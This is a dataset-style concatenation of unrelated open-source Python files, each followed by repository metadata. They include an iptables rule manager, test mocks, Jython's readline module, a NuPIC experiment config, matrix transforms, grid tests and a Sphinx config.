with excutils.save_and_reraise_exception():
try:
line_no = int(re.search(
'iptables-restore: line ([0-9]+?) failed',
str(r_error)).group(1))
context = IPTABLES_ERROR_LINES_OF_CONTEXT
log_start = max(0, line_no - context)
log_end = line_no + context
except AttributeError:
# line error wasn't found, print all lines instead
log_start = 0
log_end = len(all_lines)
log_lines = ('%7d. %s' % (idx, l)
for idx, l in enumerate(
all_lines[log_start:log_end],
log_start + 1)
)
LOG.error(_LE("IPTablesManager.apply failed to apply the "
"following set of iptables rules:\n%s"),
'\n'.join(log_lines))
LOG.debug("IPTablesManager.apply completed with success")
def _find_table(self, lines, table_name):
if len(lines) < 3:
# length only <2 when fake iptables
return (0, 0)
try:
start = lines.index('*%s' % table_name) - 1
except ValueError:
# Couldn't find table_name
LOG.debug('Unable to find table %s', table_name)
return (0, 0)
end = lines[start:].index('COMMIT') + start + 2
return (start, end)
def _find_rules_index(self, lines):
seen_chains = False
rules_index = 0
for rules_index, rule in enumerate(lines):
if not seen_chains:
if rule.startswith(':'):
seen_chains = True
else:
if not rule.startswith(':'):
break
if not seen_chains:
rules_index = 2
return rules_index
def _find_last_entry(self, filter_map, match_str):
# find last matching entry
try:
return filter_map[match_str][-1]
except KeyError:
pass
def _modify_rules(self, current_lines, table, table_name):
# Chains are stored as sets to avoid duplicates.
# Sort the output chains here to make their order predictable.
unwrapped_chains = sorted(table.unwrapped_chains)
chains = sorted(table.chains)
remove_chains = table.remove_chains
rules = table.rules
remove_rules = table.remove_rules
if not current_lines:
fake_table = ['# Generated by iptables_manager',
'*' + table_name, 'COMMIT',
'# Completed by iptables_manager']
current_lines = fake_table
# Fill old_filter with any chains or rules we might have added,
# they could have a [packet:byte] count we want to preserve.
# Fill new_filter with any chains or rules without our name in them.
old_filter, new_filter = [], []
for line in current_lines:
(old_filter if self.wrap_name in line else
new_filter).append(line.strip())
old_filter_map = make_filter_map(old_filter)
new_filter_map = make_filter_map(new_filter)
rules_index = self._find_rules_index(new_filter)
all_chains = [':%s' % name for name in unwrapped_chains]
all_chains += [':%s-%s' % (self.wrap_name, name) for name in chains]
# Iterate through all the chains, trying to find an existing
# match.
our_chains = []
for chain in all_chains:
chain_str = str(chain).strip()
old = self._find_last_entry(old_filter_map, chain_str)
if not old:
dup = self._find_last_entry(new_filter_map, chain_str)
new_filter = [s for s in new_filter if chain_str not in s.strip()]
# if no old or duplicates, use original chain
if old or dup:
chain_str = str(old or dup)
else:
# add-on the [packet:bytes]
chain_str += ' - [0:0]'
our_chains += [chain_str]
# Iterate through all the rules, trying to find an existing
# match.
our_rules = []
bot_rules = []
for rule in rules:
rule_str = str(rule).strip()
# Further down, we weed out duplicates from the bottom of the
# list, so here we remove the dupes ahead of time.
old = self._find_last_entry(old_filter_map, rule_str)
if not old:
dup = self._find_last_entry(new_filter_map, rule_str)
new_filter = [s for s in new_filter if rule_str not in s.strip()]
# if no old or duplicates, use original rule
if old or dup:
rule_str = str(old or dup)
# backup one index so we write the array correctly
if not old:
rules_index -= 1
else:
# add-on the [packet:bytes]
rule_str = '[0:0] ' + rule_str
if rule.top:
# rule.top == True means we want this rule to be at the top.
our_rules += [rule_str]
else:
bot_rules += [rule_str]
our_rules += bot_rules
new_filter[rules_index:rules_index] = our_rules
new_filter[rules_index:rules_index] = our_chains
def _strip_packets_bytes(line):
# strip any [packet:byte] counts at start or end of lines
if line.startswith(':'):
# it's a chain, for example, ":neutron-billing - [0:0]"
line = line.split(':')[1]
line = line.split(' - [', 1)[0]
elif line.startswith('['):
# it's a rule, for example, "[0:0] -A neutron-billing..."
line = line.split('] ', 1)[1]
line = line.strip()
return line
seen_chains = set()
def _weed_out_duplicate_chains(line):
# ignore [packet:byte] counts at end of lines
if line.startswith(':'):
line = _strip_packets_bytes(line)
if line in seen_chains:
return False
else:
seen_chains.add(line)
# Leave it alone
return True
seen_rules = set()
def _weed_out_duplicate_rules(line):
if line.startswith('['):
line = _strip_packets_bytes(line)
if line in seen_rules:
return False
else:
seen_rules.add(line)
# Leave it alone
return True
def _weed_out_removes(line):
# We need to find exact matches here
if line.startswith(':'):
line = _strip_packets_bytes(line)
for chain in remove_chains:
if chain == line:
remove_chains.remove(chain)
return False
elif line.startswith('['):
line = _strip_packets_bytes(line)
for rule in remove_rules:
rule_str = _strip_packets_bytes(str(rule))
if rule_str == line:
remove_rules.remove(rule)
return False
# Leave it alone
return True
# We filter duplicates. Go through the chains and rules, letting
# the *last* occurrence take precedence since it could have a
# non-zero [packet:byte] count we want to preserve. We also filter
# out anything in the "remove" list.
new_filter.reverse()
new_filter = [line for line in new_filter
if _weed_out_duplicate_chains(line) and
_weed_out_duplicate_rules(line) and
_weed_out_removes(line)]
new_filter.reverse()
# flush lists, just in case we didn't find something
remove_chains.clear()
for rule in remove_rules:
remove_rules.remove(rule)
return new_filter
def _get_traffic_counters_cmd_tables(self, chain, wrap=True):
name = get_chain_name(chain, wrap)
cmd_tables = [('iptables', key) for key, table in self.ipv4.items()
if name in table._select_chain_set(wrap)]
if self.use_ipv6:
cmd_tables += [('ip6tables', key)
for key, table in self.ipv6.items()
if name in table._select_chain_set(wrap)]
return cmd_tables
def get_traffic_counters(self, chain, wrap=True, zero=False):
"""Return the sum of the traffic counters of all rules of a chain."""
cmd_tables = self._get_traffic_counters_cmd_tables(chain, wrap)
if not cmd_tables:
LOG.warn(_LW('Attempted to get traffic counters of chain %s which '
'does not exist'), chain)
return
name = get_chain_name(chain, wrap)
acc = {'pkts': 0, 'bytes': 0}
for cmd, table in cmd_tables:
args = [cmd, '-t', table, '-L', name, '-n', '-v', '-x']
if zero:
args.append('-Z')
if self.namespace:
args = ['ip', 'netns', 'exec', self.namespace] + args
current_table = self.execute(args, run_as_root=True)
current_lines = current_table.split('\n')
for line in current_lines[2:]:
if not line:
break
data = line.split()
if (len(data) < 2 or
not data[0].isdigit() or
not data[1].isdigit()):
break
acc['pkts'] += int(data[0])
acc['bytes'] += int(data[1])
return acc
def make_filter_map(filter_list):
filter_map = collections.defaultdict(list)
for data in filter_list:
# strip any [packet:byte] counts at start or end of lines,
# for example, chains look like ":neutron-foo - [0:0]"
# and rules look like "[0:0] -A neutron-foo..."
if data.startswith('['):
key = data.rpartition('] ')[2]
elif data.endswith(']'):
key = data.rsplit(' [', 1)[0]
if key.endswith(' -'):
key = key[:-2]
else:
# things like COMMIT, *filter, and *nat land here
continue
filter_map[key].append(data)
# regular IP(v6) entries are translated into /32s or /128s so we
# include a lookup without the CIDR here to match as well
for cidr in ('/32', '/128'):
if cidr in key:
alt_key = key.replace(cidr, '')
filter_map[alt_key].append(data)
# return a regular dict so readers don't accidentally add entries
return dict(filter_map)
| apache-2.0 | 4,434,900,085,659,792,400 | 36.642951 | 79 | 0.543278 | false |
EricSB/powerline | tests/lib/config_mock.py | 3 | 5302 | # vim:fileencoding=utf-8:noet
from __future__ import (unicode_literals, division, absolute_import, print_function)
import os
from threading import Lock
from copy import deepcopy
from time import sleep
from functools import wraps
from powerline.renderer import Renderer
from powerline.lib.config import ConfigLoader
from powerline import Powerline, get_default_theme
from tests.lib import Args, replace_attr
UT = get_default_theme(is_unicode=True)
AT = get_default_theme(is_unicode=False)
class TestHelpers(object):
def __init__(self, config):
self.config = config
self.access_log = []
self.access_lock = Lock()
def loader_condition(self, path):
return (path in self.config) and path
def find_config_files(self, cfg_path, config_loader, loader_callback):
if cfg_path.endswith('.json'):
cfg_path = cfg_path[:-5]
if cfg_path.startswith('/'):
cfg_path = cfg_path.lstrip('/')
with self.access_lock:
self.access_log.append('check:' + cfg_path)
if cfg_path in self.config:
yield cfg_path
else:
if config_loader:
config_loader.register_missing(self.loader_condition, loader_callback, cfg_path)
raise IOError(('fcf:' if cfg_path.endswith('raise') else '') + cfg_path)
def load_json_config(self, config_file_path, *args, **kwargs):
if config_file_path.endswith('.json'):
config_file_path = config_file_path[:-5]
if config_file_path.startswith('/'):
config_file_path = config_file_path.lstrip('/')
with self.access_lock:
self.access_log.append('load:' + config_file_path)
try:
return deepcopy(self.config[config_file_path])
except KeyError:
raise IOError(config_file_path)
def pop_events(self):
with self.access_lock:
r = self.access_log[:]
self.access_log = []
return r
def log_call(func):
@wraps(func)
def ret(self, *args, **kwargs):
self._calls.append((func.__name__, args, kwargs))
return func(self, *args, **kwargs)
return ret
class TestWatcher(object):
events = set()
lock = Lock()
def __init__(self):
self._calls = []
@log_call
def watch(self, file):
pass
@log_call
def __call__(self, file):
with self.lock:
if file in self.events:
self.events.remove(file)
return True
return False
def _reset(self, files):
with self.lock:
self.events.clear()
self.events.update(files)
@log_call
def unsubscribe(self):
pass
class Logger(object):
def __init__(self):
self.messages = []
self.lock = Lock()
def _add_msg(self, attr, msg):
with self.lock:
self.messages.append(attr + ':' + msg)
def _pop_msgs(self):
with self.lock:
r = self.messages
self.messages = []
return r
def __getattr__(self, attr):
return lambda *args, **kwargs: self._add_msg(attr, *args, **kwargs)
class SimpleRenderer(Renderer):
def hlstyle(self, fg=None, bg=None, attrs=None):
return '<{fg} {bg} {attrs}>'.format(fg=fg and fg[0], bg=bg and bg[0], attrs=attrs)
class EvenSimplerRenderer(Renderer):
def hlstyle(self, fg=None, bg=None, attrs=None):
return '{{{fg}{bg}{attrs}}}'.format(
fg=fg and fg[0] or '-',
bg=bg and bg[0] or '-',
attrs=attrs if attrs else '',
)
class TestPowerline(Powerline):
_created = False
def __init__(self, _helpers, **kwargs):
super(TestPowerline, self).__init__(**kwargs)
self._helpers = _helpers
self.find_config_files = _helpers.find_config_files
@staticmethod
def get_local_themes(local_themes):
return local_themes
@staticmethod
def get_config_paths():
return ['']
def _will_create_renderer(self):
return self.cr_kwargs
def _pop_events(self):
return self._helpers.pop_events()
renderer = EvenSimplerRenderer
class TestConfigLoader(ConfigLoader):
def __init__(self, _helpers, **kwargs):
watcher = TestWatcher()
super(TestConfigLoader, self).__init__(
load=_helpers.load_json_config,
watcher=watcher,
watcher_type='test',
**kwargs
)
def get_powerline(config, **kwargs):
helpers = TestHelpers(config)
return get_powerline_raw(
helpers,
TestPowerline,
_helpers=helpers,
ext='test',
renderer_module='tests.lib.config_mock',
logger=Logger(),
**kwargs
)
def select_renderer(simpler_renderer=False):
global renderer
renderer = EvenSimplerRenderer if simpler_renderer else SimpleRenderer
def get_powerline_raw(helpers, PowerlineClass, replace_gcp=False, **kwargs):
if not isinstance(helpers, TestHelpers):
helpers = TestHelpers(helpers)
select_renderer(kwargs.pop('simpler_renderer', False))
if replace_gcp:
class PowerlineClass(PowerlineClass):
@staticmethod
def get_config_paths():
return ['/']
pl = PowerlineClass(
config_loader=TestConfigLoader(
_helpers=helpers,
run_once=kwargs.get('run_once')
),
**kwargs
)
pl._watcher = pl.config_loader.watcher
return pl
def swap_attributes(config, powerline_module):
return replace_attr(powerline_module, 'os', Args(
path=Args(
isfile=lambda path: path.lstrip('/').replace('.json', '') in config,
join=os.path.join,
expanduser=lambda path: path,
realpath=lambda path: path,
dirname=os.path.dirname,
),
environ={},
))
def add_watcher_events(p, *args, **kwargs):
if isinstance(p._watcher, TestWatcher):
p._watcher._reset(args)
while not p._will_create_renderer():
sleep(kwargs.get('interval', 0.1))
if not kwargs.get('wait', True):
return
| mit | 2,095,903,029,881,976,000 | 22.052174 | 84 | 0.687476 | false |
thomashaw/SecGen | modules/utilities/unix/audit_tools/ghidra/files/release/Ghidra/Features/Python/data/jython-2.7.1/Lib/readline.py | 13 | 5659 | import os.path
import sys
from warnings import warn
try:
_console = sys._jy_console
_reader = _console.reader
except AttributeError:
raise ImportError("Cannot access JLine2 setup")
try:
# jarjar-ed version
from org.python.jline.console.history import MemoryHistory
except ImportError:
# dev version from extlibs
from jline.console.history import MemoryHistory
__all__ = ['add_history', 'clear_history', 'get_begidx', 'get_completer',
'get_completer_delims', 'get_current_history_length',
'get_endidx', 'get_history_item', 'get_history_length',
'get_line_buffer', 'insert_text', 'parse_and_bind',
'read_history_file', 'read_init_file', 'redisplay',
'remove_history_item', 'set_completer', 'set_completer_delims',
'set_history_length', 'set_pre_input_hook', 'set_startup_hook',
'write_history_file']
_history_list = None
# The need for the following warnings should go away once we update
# JLine. Choosing ImportWarning as the closest warning to what is
# going on here, namely this is functionality not yet available on
# Jython.
class NotImplementedWarning(ImportWarning):
"""Not yet implemented by Jython"""
class SecurityWarning(ImportWarning):
"""Security manager prevents access to private field"""
def parse_and_bind(string):
pass
def get_line_buffer():
return str(_reader.cursorBuffer.buffer)
def insert_text(string):
_reader.putString(string)
def read_init_file(filename=None):
warn("read_init_file: %s" % (filename,), NotImplementedWarning, "module", 2)
def read_history_file(filename="~/.history"):
expanded = os.path.expanduser(filename)
with open(expanded) as f:
_reader.history.load(f)
def write_history_file(filename="~/.history"):
expanded = os.path.expanduser(filename)
with open(expanded, 'w') as f:
for line in _reader.history.entries():
f.write(line.value().encode("utf-8"))
f.write("\n")
def clear_history():
_reader.history.clear()
def add_history(line):
_reader.history.add(line)
def get_history_length():
return _reader.history.maxSize
def set_history_length(length):
_reader.history.maxSize = length
def get_current_history_length():
return _reader.history.size()
def get_history_item(index):
# JLine indexes from 0 while readline indexes from 1 (at least in test_readline)
if index>0:
return _reader.history.get(index-1)
else:
return None
def remove_history_item(pos):
_reader.history.remove(pos)
def replace_history_item(pos, line):
_reader.history.set(pos, line)
def redisplay():
_reader.redrawLine()
def set_startup_hook(function=None):
_console.startupHook = function
def set_pre_input_hook(function=None):
warn("set_pre_input_hook %s" % (function,), NotImplementedWarning, stacklevel=2)
_completer_function = None
def set_completer(function=None):
"""set_completer([function]) -> None
Set or remove the completer function.
The function is called as function(text, state),
for state in 0, 1, 2, ..., until it returns a non-string.
It should return the next possible completion starting with 'text'."""
global _completer_function
_completer_function = function
def complete_handler(buffer, cursor, candidates):
start = _get_delimited(buffer, cursor)[0]
delimited = buffer[start:cursor]
try:
sys.ps2
have_ps2 = True
except AttributeError:
have_ps2 = False
if (have_ps2 and _reader.prompt == sys.ps2) and (not delimited or delimited.isspace()):
# Insert tab (as expanded to 4 spaces), but only if if
# preceding is whitespace/empty and in console
# continuation; this is a planned featue for Python 3 per
# http://bugs.python.org/issue5845
#
# Ideally this would not expand tabs, in case of mixed
# copy&paste of tab-indented code, however JLine2 gets
# confused as to the cursor position if certain, but not
# all, subsequent editing if the tab is backspaced
candidates.add(" " * 4)
return start
# TODO: if there are a reasonably large number of completions
# (need to get specific numbers), CPython 3.4 will show a
# message like so:
# >>>
# Display all 186 possibilities? (y or n)
# Currently Jython arbitrarily limits this to 100 and displays them
for state in xrange(100):
completion = None
try:
completion = function(delimited, state)
except:
pass
if completion:
candidates.add(completion)
else:
break
return start
_reader.addCompleter(complete_handler)
def get_completer():
return _completer_function
def _get_delimited(buffer, cursor):
start = cursor
for i in xrange(cursor-1, -1, -1):
if buffer[i] in _completer_delims:
break
start = i
return start, cursor
def get_begidx():
return _get_delimited(str(_reader.cursorBuffer.buffer), _reader.cursorBuffer.cursor)[0]
def get_endidx():
return _get_delimited(str(_reader.cursorBuffer.buffer), _reader.cursorBuffer.cursor)[1]
def set_completer_delims(string):
global _completer_delims, _completer_delims_set
_completer_delims = string
_completer_delims_set = set(string)
def get_completer_delims():
return _completer_delims
set_completer_delims(' \t\n`~!@#$%^&*()-=+[{]}\\|;:\'",<>/?')
| gpl-3.0 | 4,725,312,246,557,732,000 | 29.755435 | 95 | 0.646934 | false |
gamahead/nupic | tests/swarming/nupic/swarming/experiments/input_predicted_field/description.py | 8 | 14110 | # ----------------------------------------------------------------------
# Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2013, Numenta, Inc. Unless you have an agreement
# with Numenta, Inc., for a separate license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
# ----------------------------------------------------------------------
"""
Template file used by the OPF Experiment Generator to generate the actual
description.py file by replacing $XXXXXXXX tokens with desired values.
This description.py file was generated by:
'/Users/ronmarianetti/nupic/eng/lib/python2.6/site-packages/nupicengine/frameworks/opf/expGenerator/ExpGenerator.pyc'
"""
from nupic.frameworks.opf.expdescriptionapi import ExperimentDescriptionAPI
from nupic.frameworks.opf.expdescriptionhelpers import (
updateConfigFromSubConfig,
applyValueGettersToContainer
)
from nupic.frameworks.opf.clamodelcallbacks import *
from nupic.frameworks.opf.metrics import MetricSpec
from nupic.frameworks.opf.opfutils import (InferenceType,
InferenceElement)
from nupic.support import aggregationDivide
from nupic.frameworks.opf.opftaskdriver import (
IterationPhaseSpecLearnOnly,
IterationPhaseSpecInferOnly,
IterationPhaseSpecLearnAndInfer)
# Model Configuration Dictionary:
#
# Define the model parameters and adjust for any modifications if imported
# from a sub-experiment.
#
# These fields might be modified by a sub-experiment; this dict is passed
# between the sub-experiment and base experiment
#
#
config = {
# Type of model that the rest of these parameters apply to.
'model': "CLA",
# Version that specifies the format of the config.
'version': 1,
# Intermediate variables used to compute fields in modelParams and also
# referenced from the control section.
'aggregationInfo': { 'days': 0,
'fields': [ (u'timestamp', 'first'),
(u'consumption', 'sum'),
],
'hours': 0,
'microseconds': 0,
'milliseconds': 0,
'minutes': 0,
'months': 0,
'seconds': 0,
'weeks': 0,
'years': 0},
'predictAheadTime': None,
# Model parameter dictionary.
'modelParams': {
# The type of inference that this model will perform
'inferenceType': 'TemporalMultiStep',
'sensorParams': {
# Sensor diagnostic output verbosity control;
# if > 0: sensor region will print out on screen what it's sensing
# at each step 0: silent; >=1: some info; >=2: more info;
# >=3: even more info (see compute() in py/regions/RecordSensor.py)
'verbosity' : 0,
# Example:
# 'encoders': {'field1': {'fieldname': 'field1', 'n':100,
# 'name': 'field1', 'type': 'AdaptiveScalarEncoder',
# 'w': 21}}
#
'encoders': {
'consumption': {
'clipInput': True,
'fieldname': u'consumption',
'n': 100,
'name': u'consumption',
'type': 'AdaptiveScalarEncoder',
'w': 21},
'address': {
'fieldname': u'address',
'n': 300,
'name': u'address',
'type': 'SDRCategoryEncoder',
'w': 21},
'gym': {
'fieldname': u'gym',
'n': 100,
'name': u'gym',
'type': 'SDRCategoryEncoder',
'w': 21},
'timestamp_dayOfWeek': {
'dayOfWeek': (7, 3),
'fieldname': u'timestamp',
'name': u'timestamp_dayOfWeek',
'type': 'DateEncoder'},
'timestamp_timeOfDay': {
'fieldname': u'timestamp',
'name': u'timestamp_timeOfDay',
'timeOfDay': (7, 8),
'type': 'DateEncoder'},
'_classifierInput': {
'name': u'_classifierInput',
'fieldname': u'consumption',
'classifierOnly': True,
'type': 'AdaptiveScalarEncoder',
'clipInput': True,
'n': 100,
'w': 21},
},
# A dictionary specifying the period for automatically-generated
# resets from a RecordSensor;
#
# None = disable automatically-generated resets (also disabled if
# all of the specified values evaluate to 0).
# Valid keys is the desired combination of the following:
# days, hours, minutes, seconds, milliseconds, microseconds, weeks
#
# Example for 1.5 days: sensorAutoReset = dict(days=1,hours=12),
#
# (value generated from SENSOR_AUTO_RESET)
'sensorAutoReset' : { u'days': 0, u'hours': 0},
},
'spEnable': True,
'spParams': {
# SP diagnostic output verbosity control;
# 0: silent; >=1: some info; >=2: more info;
'spVerbosity' : 0,
'globalInhibition': 1,
# Number of cell columns in the cortical region (same number for
# SP and TP)
# (see also tpNCellsPerCol)
'columnCount': 2048,
'inputWidth': 0,
# SP inhibition control (absolute value);
# Maximum number of active columns in the SP region's output (when
# there are more, the weaker ones are suppressed)
'numActiveColumnsPerInhArea': 40,
'seed': 1956,
# potentialPct
# What percent of the columns's receptive field is available
# for potential synapses. At initialization time, we will
# choose potentialPct * (2*potentialRadius+1)^2
'potentialPct': 0.5,
# The default connected threshold. Any synapse whose
# permanence value is above the connected threshold is
# a "connected synapse", meaning it can contribute to the
# cell's firing. Typical value is 0.10. Cells whose activity
# level before inhibition falls below minDutyCycleBeforeInh
# will have their own internal synPermConnectedCell
# threshold set below this default value.
# (This concept applies to both SP and TP and so 'cells'
# is correct here as opposed to 'columns')
'synPermConnected': 0.1,
'synPermActiveInc': 0.1,
'synPermInactiveDec': 0.01,
},
# Controls whether TP is enabled or disabled;
# TP is necessary for making temporal predictions, such as predicting
# the next inputs. Without TP, the model is only capable of
# reconstructing missing sensor inputs (via SP).
'tpEnable' : True,
'tpParams': {
# TP diagnostic output verbosity control;
# 0: silent; [1..6]: increasing levels of verbosity
# (see verbosity in nupic/trunk/py/nupic/research/TP.py and TP10X*.py)
'verbosity': 0,
# Number of cell columns in the cortical region (same number for
# SP and TP)
# (see also tpNCellsPerCol)
'columnCount': 2048,
# The number of cells (i.e., states), allocated per column.
'cellsPerColumn': 32,
'inputWidth': 2048,
'seed': 1960,
# Temporal Pooler implementation selector (see _getTPClass in
# CLARegion.py).
'temporalImp': 'cpp',
# New Synapse formation count
# NOTE: If None, use spNumActivePerInhArea
#
# TODO: need better explanation
'newSynapseCount': 20,
# Maximum number of synapses per segment
# > 0 for fixed-size CLA
# -1 for non-fixed-size CLA
#
# TODO: for Ron: once the appropriate value is placed in TP
# constructor, see if we should eliminate this parameter from
# description.py.
'maxSynapsesPerSegment': 32,
# Maximum number of segments per cell
# > 0 for fixed-size CLA
# -1 for non-fixed-size CLA
#
# TODO: for Ron: once the appropriate value is placed in TP
# constructor, see if we should eliminate this parameter from
# description.py.
'maxSegmentsPerCell': 128,
# Initial Permanence
# TODO: need better explanation
'initialPerm': 0.21,
# Permanence Increment
'permanenceInc': 0.1,
# Permanence Decrement
# If set to None, will automatically default to tpPermanenceInc
# value.
'permanenceDec' : 0.1,
'globalDecay': 0.0,
'maxAge': 0,
# Minimum number of active synapses for a segment to be considered
# during search for the best-matching segments.
# None=use default
# Replaces: tpMinThreshold
'minThreshold': 12,
# Segment activation threshold.
# A segment is active if it has >= tpSegmentActivationThreshold
# connected synapses that are active due to infActiveState
# None=use default
# Replaces: tpActivationThreshold
'activationThreshold': 16,
'outputType': 'normal',
# "Pay Attention Mode" length. This tells the TP how many new
# elements to append to the end of a learned sequence at a time.
# Smaller values are better for datasets with short sequences,
# higher values are better for datasets with long sequences.
'pamLength': 1,
},
'clParams': {
'regionName' : 'CLAClassifierRegion',
# Classifier diagnostic output verbosity control;
# 0: silent; [1..6]: increasing levels of verbosity
'clVerbosity' : 0,
# This controls how fast the classifier learns/forgets. Higher values
# make it adapt faster and forget older patterns faster.
'alpha': 0.001,
# This is set after the call to updateConfigFromSubConfig and is
# computed from the aggregationInfo and predictAheadTime.
'steps': '1',
},
'anomalyParams': { u'anomalyCacheRecords': None,
u'autoDetectThreshold': None,
u'autoDetectWaitRecords': None},
'trainSPNetOnlyIfRequested': False,
},
}
# end of config dictionary
# Adjust base config dictionary for any modifications if imported from a
# sub-experiment
updateConfigFromSubConfig(config)
# Compute predictionSteps based on the predictAheadTime and the aggregation
# period, which may be permuted over.
if config['predictAheadTime'] is not None:
predictionSteps = int(round(aggregationDivide(
config['predictAheadTime'], config['aggregationInfo'])))
assert (predictionSteps >= 1)
config['modelParams']['clParams']['steps'] = str(predictionSteps)
# Adjust config by applying ValueGetterBase-derived
# futures. NOTE: this MUST be called after updateConfigFromSubConfig() in order
# to support value-getter-based substitutions from the sub-experiment (if any)
applyValueGettersToContainer(config)
control = {
# The environment that the current model is being run in
"environment": 'nupic',
# Input stream specification per py/nupic/frameworks/opf/jsonschema/stream_def.json.
#
'dataset' : {
u'info': u'test_hotgym',
u'streams': [ { u'columns': [u'*'],
u'info': u'test data',
u'source': u'file://swarming/test_data.csv'}],
u'version': 1},
# Iteration count: maximum number of iterations. Each iteration corresponds
# to one record from the (possibly aggregated) dataset. The task is
# terminated when either number of iterations reaches iterationCount or
# all records in the (possibly aggregated) database have been processed,
# whichever occurs first.
#
# iterationCount of -1 = iterate over the entire dataset
'iterationCount' : -1,
# A dictionary containing all the supplementary parameters for inference
"inferenceArgs":{u'predictedField': u'consumption', u'predictionSteps': [1]},
# Metrics: A list of MetricSpecs that instantiate the metrics that are
# computed for this experiment
'metrics':[
MetricSpec(field=u'consumption', metric='multiStep',
inferenceElement='multiStepBestPredictions',
params={'window': 1000, 'steps': [1], 'errorMetric': 'altMAPE'}),
],
# Logged Metrics: A sequence of regular expressions that specify which of
# the metrics from the Inference Specifications section MUST be logged for
# every prediction. The regex's correspond to the automatically generated
# metric labels. This is similar to the way the optimization metric is
# specified in permutations.py.
'loggedMetrics': ['.*'],
}
descriptionInterface = ExperimentDescriptionAPI(modelConfig=config,
control=control)
| gpl-3.0 | 1,349,712,527,599,715,300 | 36.229551 | 117 | 0.586889 | false |
VanHulleOne/DogBone | matrixTrans.py | 1 | 2048 | # -*- coding: utf-8 -*-
"""
Created on Thu Jan 07 17:44:20 2016
A module to store operations related to matrix tranformations.
@author: Luke
"""
import Point as p
import Line as l
import constants as c
import numpy
import math
def translateMatrix(shiftX, shiftY, shiftZ=0):
transMatrix = numpy.identity(4)
transMatrix[c.X][3] = shiftX
transMatrix[c.Y][3] = shiftY
transMatrix[c.Z][3] = shiftZ
return transMatrix
def rotateMatrix(angle, point=None):
if point is None:
point = p.Point(0,0)
toOrigin = translateMatrix(-point.x, -point.y)
rotateMatrix = numpy.identity(4)
rotateMatrix[c.X][0] = math.cos(angle)
rotateMatrix[c.Y][0] = math.sin(angle)
rotateMatrix[c.X][1] = -rotateMatrix[c.Y][0]
rotateMatrix[c.Y][1] = rotateMatrix[c.X][0]
transBack = translateMatrix(point.x, point.y)
transMatrix = numpy.dot(transBack, numpy.dot(rotateMatrix, toOrigin))
return transMatrix
def mirrorMatrix(axis):
transMatrix = numpy.identity(4)
if type(axis) is l.Line:
mList = []
mList.append(translateMatrix(-axis.start.x, -axis.start.y)) #toOrigin
angle = math.asin((axis.end.y-axis.start.y)/axis.length) #angle
# print 'Angle: %.2f'%(angle/(2*math.pi)*360)
mList.append(rotateMatrix(-angle)) #rotate to X-axis
xMirror = numpy.identity(4)
xMirror[c.Y][c.Y] = -1
mList.append(xMirror) #mirror about X axis
mList.append(rotateMatrix(angle)) #rotate back
mList.append(translateMatrix(axis.start.x, axis.start.y)) #translate back
for matrix in mList:
transMatrix = numpy.dot(matrix, transMatrix)
return transMatrix
if(axis == c.X):
transMatrix[c.Y][c.Y] *= -1
else:
transMatrix[c.X][c.X] *= -1
return transMatrix
def combineTransformations(matrixList):
transMatrix = numpy.identity(4)
for matrix in matrixList:
transMatrix = numpy.dot(matrix, transMatrix)
return transMatrix
| mit | -7,767,282,250,371,348,000 | 31.015625 | 90 | 0.637695 | false |
csherwood-usgs/landlab | landlab/grid/tests/test_raster_funcs/test_is_on_grid.py | 6 | 1700 | import numpy as np
from numpy.testing import assert_array_equal
from nose import with_setup
from nose.tools import (assert_equal, assert_raises)
try:
from nose.tools import assert_is
except ImportError:
from landlab.testing.tools import assert_is
from landlab.grid import raster_funcs as rfuncs
from landlab import RasterModelGrid
def test_with_arrays():
"""Test with arrays as arg."""
rmg = RasterModelGrid((4, 5), spacing=(2., 2.))
coords = (np.array([1., -1.]), np.array([1., -1.]))
assert_array_equal(rfuncs.is_coord_on_grid(rmg, coords),
np.array([True, False]))
def test_just_inside():
"""Test with points just inside the grid."""
rmg = RasterModelGrid((4, 5), spacing=(2., 2.))
assert_equal(rfuncs.is_coord_on_grid(rmg, (0., 4.)), True)
assert_equal(rfuncs.is_coord_on_grid(rmg, (8. - 1e-12, 4.)), True)
assert_equal(rfuncs.is_coord_on_grid(rmg, (3., 0.)), True)
assert_equal(rfuncs.is_coord_on_grid(rmg, (3., 6. - 1e-12)), True)
def test_just_outside():
"""Test with points just outside the grid."""
rmg = RasterModelGrid((4, 5), spacing=(2., 2.))
assert_equal(rfuncs.is_coord_on_grid(rmg, (0. - 1e-12, 4.)), False)
assert_equal(rfuncs.is_coord_on_grid(rmg, (8., 4.)), False)
assert_equal(rfuncs.is_coord_on_grid(rmg, (3., 0. - 1e-12)), False)
assert_equal(rfuncs.is_coord_on_grid(rmg, (3., 6.)), False)
def test_just_x():
"""Test check if points are within the x bounds."""
rmg = RasterModelGrid((4, 5), spacing=(2., 2.))
assert_equal(rfuncs.is_coord_on_grid(rmg, (4., 1.e6), axes=(1, )), True)
assert_equal(rfuncs.is_coord_on_grid(rmg, (-1., 1.), axes=(1, )), False)
| mit | -5,533,083,016,274,396,000 | 35.170213 | 76 | 0.634706 | false |
sfermigier/flask-linktester | docs/conf.py | 1 | 1823 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(
0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))
sys.path.append(os.path.abspath('_themes'))
# Reused
from setup import VERSION
NAME = "Flask-LinkTester"
YEAR = "2012-2017"
AUTHOR = "Stefane Fermigier"
# -- General configuration -----------------------------------------------------
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.intersphinx']
templates_path = ['_templates']
source_suffix = '.rst'
master_doc = 'index'
project = NAME
copyright = u"%s, %s" % (YEAR, AUTHOR)
version = VERSION
release = VERSION
exclude_patterns = ['_build']
html_theme = 'flask_small'
html_theme_path = ['_themes']
html_static_path = ['_static']
html_theme_options = {
#'index_logo': 'flask-testing.png', # TODO
'github_fork': 'sfermigier/flask-linktester'
}
htmlhelp_basename = 'flask-linktesterdoc'
# -- Options for LaTeX output --------------------------------------------------
# The paper size ('letter' or 'a4').
latex_elements = {
'papersize': 'a4',
